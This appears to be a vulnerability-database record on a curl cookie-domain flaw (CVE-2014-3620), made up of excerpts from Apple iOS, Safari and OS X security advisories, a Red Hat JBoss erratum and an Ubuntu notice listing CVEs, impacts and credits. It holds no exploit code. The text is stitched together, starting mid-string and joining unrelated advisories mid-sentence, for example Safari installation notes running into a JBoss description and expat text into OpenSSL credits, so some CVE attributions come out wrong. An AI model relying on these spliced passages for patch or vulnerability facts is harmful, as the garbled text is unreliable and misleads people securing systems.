may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with\nTrend Micro\u0027s Zero Day Initiative (ZDI)\n\nHTTPProtocol\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple vulnerabilities existed in nghttp2 versions\nprior to 1.6.0, the most serious of which may have led to remote code\nexecution. These were addressed by updating nghttp2 to version 1.6.0. \nCVE-ID\nCVE-2015-8659\n\nIOHIDFamily\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to determine kernel memory layout\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2016-1748 : Brandon Azad\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to cause a denial of service\nDescription: A denial of service issue was addressed through\nimproved validation. \nCVE-ID\nCVE-2016-1752 : CESG\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A use after free issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2016-1750 : CESG\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple integer overflows were addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro\u0027s Zero\nDay Initiative (ZDI)\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to bypass code signing\nDescription: A permissions issue existed in which execute permission\nwas incorrectly granted. This issue was addressed through improved\npermission validation. \nCVE-ID\nCVE-2016-1751 : Eric Monti of Square Mobile Security\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A race condition existed during the creation of new\nprocesses. This was addressed through improved state handling. \nCVE-ID\nCVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vila\u00e7a\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team\nCVE-2016-1755 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to determine kernel memory layout\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-ID\nCVE-2016-1758 : Brandon Azad\n\nLaunchServices\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An application may be able to modify events from other\napplications\nDescription: An event handler validation issue existed in the XPC\nServices API. This issue was addressed through improved message\nvalidation. \nCVE-ID\nCVE-2016-1760 : Proteas of Qihoo 360 Nirvan Team\n\nlibxml2\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2015-1819\nCVE-2015-5312 : David Drysdale of Google\nCVE-2015-7499\nCVE-2015-7500 : Kostya Serebryany of Google\nCVE-2015-7942 : Kostya Serebryany of Google\nCVE-2015-8035 : gustavo.grieco\nCVE-2015-8242 : Hugh Davenport\nCVE-2016-1761 : wol0xff working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1762\n\nMessages\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may auto-fill text\ninto other Message threads\nDescription: An issue existed in the parsing of SMS URLs. This issue\nwas addressed through improved URL validation. \nCVE-ID\nCVE-2016-1763 : CityTog\n\nMessages\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker who is able to bypass Apple\u0027s certificate\npinning, intercept TLS connections, inject messages, and record\nencrypted attachment-type messages may be able to read attachments\nDescription: A cryptographic issue was addressed by rejecting\nduplicate messages on the client. \nCVE-ID\nCVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk,\nIan Miers, and Michael Rushanan of Johns Hopkins University\n\nProfiles\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An untrusted MDM profile may be incorrectly displayed as\nverified\nDescription: A certificate validation issue existed in MDM profiles. \nThis was addressed through additional checks. \nCVE-ID\nCVE-2016-1766 : Taylor Boyko working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nSecurity\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the ASN.1 decoder. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2016-1950 : Francis Gabriel of Quarkslab\n\nTrueTypeScaler\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing a maliciously crafted font file may lead to\narbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2016-1775 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-ID\nCVE-2016-1778 : 0x1byte working with Trend Micro\u0027s Zero Day\nInitiative (ZDI)\nCVE-2016-1783 : Mihai Parparita of Google\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A website may be able to track sensitive user information\nDescription: An issue existed in the handling of attachment URLs. \nThis issue was addressed through improved URL handling. \nCVE-ID\nCVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc. \n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A website may be able to track sensitive user information\nDescription: A hidden web page may be able to access device-\norientation and device-motion data. This issue was addressed by\nsuspending the availability of this data when the web view is hidden. \nCVE-ID\nCVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. \nShahandashti, and Feng Hao of the School of Computing Science,\nNewcastle University, UK\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a maliciously crafted website may reveal a user\u0027s\ncurrent location\nDescription: An issue existed in the parsing of geolocation\nrequests. This was addressed through improved validation of the\nsecurity origin for geolocation requests. \nCVE-ID\nCVE-2016-1779 : xisigr of Tencent\u0027s Xuanwu Lab\n(http://www.tencent.com)\n\nWebKit\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may be able to access restricted ports\non arbitrary servers\nDescription: A port redirection issue was addressed through\nadditional port validation. \nCVE-ID\nCVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit\nTechnologies Co.,Ltd. \n\nWebKit History\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Processing maliciously crafted web content may lead to an\nunexpected Safari crash\nDescription: A resource exhaustion issue was addressed through\nimproved input validation. \nCVE-ID\nCVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and \u674e\u666e\u541b of\n\u65e0\u58f0\u4fe1\u606f\u6280\u672fPKAV Team (PKAV.net)\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: Redirect responses may have allowed a malicious website\nto display an arbitrary URL and read cached contents of the\ndestination origin. This issue was addressed through improved URL\ndisplay logic. \nCVE-ID\nCVE-2016-1786 : ma.la of LINE Corporation\n\nWebKit Page Loading\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A malicious website may exfiltrate data cross-origin\nDescription: A caching issue existed with character encoding. This\nwas addressed through additional request checking. \nCVE-ID\nCVE-2016-1785 : an anonymous researcher\n\nWi-Fi\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker with a privileged network position may be able\nto execute arbitrary code\nDescription: A frame validation and memory corruption issue existed\nfor a given ethertype. This issue was addressed through additional\nethertype validation and improved memory handling. \nCVE-ID\nCVE-2016-0801 : an anonymous researcher\nCVE-2016-0802 : an anonymous researcher\n\nInstallation note:\n\nThis update is available through iTunes and Software Update on your\niOS device, and will not appear in your computer\u0027s Software Update\napplication, or in the Apple Downloads site. Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. The version after applying this update\nwill be \"9.3 \". \n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJW8JPyAAoJEBcWfLTuOo7tWzQP/i8AwdkoE9uvhfe5X5p1yDxr\nYVcAkvHAgWzNee9Tvc6ERa2KWdOkmbVRGzySyG62lhGnrUTSMtlCs0/Bp/Ui5p65\nFF2viREhDJNA83WZcsFP0ELZVJ5VwUv6BJR0L0ERn7QSfaftAwVSFmyHHURA7rGj\nIRQWnwD6IOblI0veLXjJjN8nPY2ueAzVvyv5mD8c4MdCxwxZNi2X9ugtIBBbZr6Y\narjAVh/wfB0m+f50feDaPvo/8mZDn1UwrDu0YPtGDmGebgX17TE39q0YgOFf0uXv\nHzA0S1+mDURGR3h+7wpyO25+uOPHyGkeIA1GVISA2O7pmHKTcY5pvWC4zyIsDfRC\nziI4AIml9ySY7nIltuUWeUdO81nHrjvEtXyWZ6VBH4Dah4yne80B04UGgLIzD1ON\nhTlTySVnMBJ8+N0g+e3ldGTuf49ISEKh9s6u+ABtBi9+sDSiWxGIkvNuZN37522O\ndK4MsAZIffxbKo2DuJxiWrfIzhAOO3rZbRD8oFkOtKh5QHlS1eOBlN29U9S1Cq+P\njZ/sffscri8q9m8KUx4a+1HG3N6TDIJtIz7/jJyTld2Aw+1JAlU4DG41t1lkEs6S\n41wah3j9YrqXCp2uc3JmcI6k2XW2pj73T9Mqqz5e/xk2sfwnJ299dAK7vXkGR3ix\nFg29LzTb0eQ9Ub1Mkn5E\n=Ouex\n-----END PGP SIGNATURE-----\n. \nCVE-ID\nCVE-2016-1762\n\nSafari\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nOS X El Capitan v10.11 to v10.11.3\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: An issue existed where the text of a dialog included\npage-supplied text. \nCVE-ID\nCVE-2016-1786 : ma.la of LINE Corporation\n\nInstallation note:\n\nSafari 9.1 may be obtained from the Mac App Store. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. \n\nSecurity Fix(es):\n\n* This update fixes several flaws in OpenSSL. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team)\nas the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),\nHanno BAPck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,\nCVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj\nSomorovsky as the original reporter of CVE-2016-2107; Yuval Yarom\n(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv\nUniversity), and Nadia Heninger (University of Pennsylvania) as the\noriginal reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as\nthe original reporter of CVE-2016-0705. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6",
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VAR-201411-0410
Vulnerability from variot - Updated: 2026-04-10 23:15cURL and libcurl before 7.38.0 does not properly handle IP addresses in cookie domain names, which allows remote attackers to set cookies for or send arbitrary cookies to certain sites, as demonstrated by a site at 192.168.0.1 setting cookies for a site at 127.168.0.1. cURL/libcURL is prone to a remote security-bypass vulnerability. An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. cURL/libcURL 7.1 through 7.37.1 are vulnerable. Both Haxx curl and libcurl are products of the Swedish company Haxx. libcurl is a free, open source client-side URL transfer library. ============================================================================ Ubuntu Security Notice USN-2346-1 September 15, 2014
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in curl. (CVE-2014-3620)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libcurl3 7.35.0-1ubuntu2.1 libcurl3-gnutls 7.35.0-1ubuntu2.1 libcurl3-nss 7.35.0-1ubuntu2.1
Ubuntu 12.04 LTS: libcurl3 7.22.0-3ubuntu4.10 libcurl3-gnutls 7.22.0-3ubuntu4.10 libcurl3-nss 7.22.0-3ubuntu4.10
Ubuntu 10.04 LTS: libcurl3 7.19.7-1ubuntu1.9 libcurl3-gnutls 7.19.7-1ubuntu1.9
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006
OS X Yosemite v10.10.5 and Security Update 2015-006 is now available and addresses the following:
apache Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in Apache 2.4.16, the most serious of which may allow a remote attacker to cause a denial of service. Description: Multiple vulnerabilities existed in Apache versions prior to 2.4.16. These were addressed by updating Apache to version 2.4.16. CVE-ID CVE-2014-3581 CVE-2014-3583 CVE-2014-8109 CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 CVE-2015-3185
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in PHP 5.5.20, the most serious of which may lead to arbitrary code execution. Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.20. These were addressed by updating Apache to version 5.5.27. CVE-ID CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147 CVE-2015-4148
Apple ID OD Plug-in Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able change the password of a local user Description: In some circumstances, a state management issue existed in password authentication. The issue was addressed through improved state management. CVE-ID CVE-2015-3799 : an anonymous researcher working with HP's Zero Day Initiative
AppleGraphicsControl Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in AppleGraphicsControl which could have led to the disclosure of kernel memory layout. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5768 : JieTao Yang of KeenTeam
Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOBluetoothHCIController. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3779 : Teddy Reed of Facebook Security
Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue could have led to the disclosure of kernel memory layout. This issue was addressed with improved memory management. CVE-ID CVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze Networks
Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious app may be able to access notifications from other iCloud devices Description: An issue existed where a malicious app could access a Bluetooth-paired Mac or iOS device's Notification Center notifications via the Apple Notification Center Service. The issue affected devices using Handoff and logged into the same iCloud account. This issue was resolved by revoking access to the Apple Notification Center Service. CVE-ID CVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security Lab (Indiana University), Tongxin Li (Peking University), XiaoFeng Wang (Indiana University)
Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: An attacker with privileged network position may be able to perform denial of service attack using malformed Bluetooth packets Description: An input validation issue existed in parsing of Bluetooth ACL packets. This issue was addressed through improved input validation. CVE-ID CVE-2015-3787 : Trend Micro
Bluetooth Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: Multiple buffer overflow issues existed in blued's handling of XPC messages. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-3777 : mitp0sh of [PDX]
bootp Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious Wi-Fi network may be able to determine networks a device has previously accessed Description: Upon connecting to a Wi-Fi network, iOS may have broadcast MAC addresses of previously accessed networks via the DNAv4 protocol. This issue was addressed through disabling DNAv4 on unencrypted Wi-Fi networks. CVE-ID CVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute, University of Oxford (on the EPSRC Being There project)
CloudKit Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to access the iCloud user record of a previously signed in user Description: A state inconsistency existed in CloudKit when signing out users. This issue was addressed through improved state handling. CVE-ID CVE-2015-3782 : Deepkanwal Plaha of University of Toronto
CoreMedia Playback Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in CoreMedia Playback. These were addressed through improved memory handling. CVE-ID CVE-2015-5777 : Apple CVE-2015-5778 : Apple
CoreText Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team
curl Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities in cURL and libcurl prior to 7.38.0, one of which may allow remote attackers to bypass the Same Origin Policy. Description: Multiple vulnerabilities existed in cURL and libcurl prior to 7.38.0. These issues were addressed by updating cURL to version 7.43.0. CVE-ID CVE-2014-3613 CVE-2014-3620 CVE-2014-3707 CVE-2014-8150 CVE-2014-8151 CVE-2015-3143 CVE-2015-3144 CVE-2015-3145 CVE-2015-3148 CVE-2015-3153
Data Detectors Engine Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a sequence of unicode characters can lead to an unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in processing of Unicode characters. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)
Date & Time pref pane Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Applications that rely on system time may have unexpected behavior Description: An authorization issue existed when modifying the system date and time preferences. This issue was addressed with additional authorization checks. CVE-ID CVE-2015-3757 : Mark S C Smith
Dictionary Application Available for: OS X Yosemite v10.10 to v10.10.4 Impact: An attacker with a privileged network position may be able to intercept users' Dictionary app queries Description: An issue existed in the Dictionary app, which did not properly secure user communications. This issue was addressed by moving Dictionary queries to HTTPS. CVE-ID CVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security Team
DiskImages Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted DMG file may lead to an unexpected application termination or arbitrary code execution with system privileges Description: A memory corruption issue existed in parsing of malformed DMG images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team
dyld Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A path validation issue existed in dyld. This was addressed through improved environment sanitization. CVE-ID CVE-2015-3760 : beist of grayhash, Stefan Esser
FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3804 : Apple CVE-2015-5775 : Apple
FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team
groff Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple issues in pdfroff Description: Multiple issues existed in pdfroff, the most serious of which may allow arbitrary filesystem modification. These issues were addressed by removing pdfroff. CVE-ID CVE-2009-5044 CVE-2009-5078
ImageIO Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of TIFF images. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5758 : Apple
ImageIO Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Visiting a maliciously crafted website may result in the disclosure of process memory Description: An uninitialized memory access issue existed in ImageIO's handling of PNG and TIFF images. Visiting a malicious website may result in sending data from process memory to the website. This issue is addressed through improved memory initialization and additional validation of PNG and TIFF images. CVE-ID CVE-2015-5781 : Michal Zalewski CVE-2015-5782 : Michal Zalewski
Install Framework Legacy Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with root privileges Description: An issue existed in how Install.framework's 'runner' binary dropped privileges. This issue was addressed through improved privilege management. CVE-ID CVE-2015-5784 : Ian Beer of Google Project Zero
Install Framework Legacy Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A race condition existed in Install.framework's 'runner' binary that resulted in privileges being incorrectly dropped. This issue was addressed through improved object locking. CVE-ID CVE-2015-5754 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: Memory corruption issues existed in IOFireWireFamily. These issues were addressed through additional type input validation. CVE-ID CVE-2015-3769 : Ilja van Sprundel CVE-2015-3771 : Ilja van Sprundel CVE-2015-3772 : Ilja van Sprundel
IOGraphics Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOGraphics. This issue was addressed through additional type input validation. CVE-ID CVE-2015-3770 : Ilja van Sprundel CVE-2015-5783 : Ilja van Sprundel
IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5774 : TaiG Jailbreak Team
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in the mach_port_space_info interface, which could have led to the disclosure of kernel memory layout. This was addressed by disabling the mach_port_space_info interface. CVE-ID CVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team, @PanguTeam
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments. CVE-ID CVE-2015-3768 : Ilja van Sprundel
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to cause a system denial of service Description: A resource exhaustion issue existed in the fasttrap driver. This was addressed through improved memory handling. CVE-ID CVE-2015-5747 : Maxime VILLARD of m00nbsd
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to cause a system denial of service Description: A validation issue existed in the mounting of HFS volumes. This was addressed by adding additional checks. CVE-ID CVE-2015-5748 : Maxime VILLARD of m00nbsd
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute unsigned code Description: An issue existed that allowed unsigned code to be appended to signed code in a specially crafted executable file. This issue was addressed through improved code signature validation. CVE-ID CVE-2015-3806 : TaiG Jailbreak Team
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A specially crafted executable file could allow unsigned, malicious code to execute Description: An issue existed in the way multi-architecture executable files were evaluated that could have allowed unsigned code to be executed. This issue was addressed through improved validation of executable files. CVE-ID CVE-2015-3803 : TaiG Jailbreak Team
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute unsigned code Description: A validation issue existed in the handling of Mach-O files. This was addressed by adding additional checks. CVE-ID CVE-2015-3802 : TaiG Jailbreak Team CVE-2015-3805 : TaiG Jailbreak Team
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted plist may lead to an unexpected application termination or arbitrary code execution with system privileges Description: A memory corruption existed in processing of malformed plists. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein (@jollyjinx) of Jinx Germany
Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A path validation issue existed. This was addressed through improved environment sanitization. CVE-ID CVE-2015-3761 : Apple
Libc Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted regular expression may lead to an unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in the TRE library. These were addressed through improved memory handling. CVE-ID CVE-2015-3796 : Ian Beer of Google Project Zero CVE-2015-3797 : Ian Beer of Google Project Zero CVE-2015-3798 : Ian Beer of Google Project Zero
Libinfo Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in handling AF_INET6 sockets. These were addressed by improved memory handling. CVE-ID CVE-2015-5776 : Apple
libpthread Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in handling syscalls. This issue was addressed through improved lock state checking. CVE-ID CVE-2015-5757 : Lufeng Li of Qihoo 360
libxml2 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2, the most serious of which may allow a remote attacker to cause a denial of service Description: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2. These were addressed by updating libxml2 to version 2.9.2. CVE-ID CVE-2012-6685 : Felix Groebert of Google CVE-2014-0191 : Felix Groebert of Google
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: A memory access issue existed in libxml2. This was addressed by improved memory handling CVE-ID CVE-2014-3660 : Felix Groebert of Google
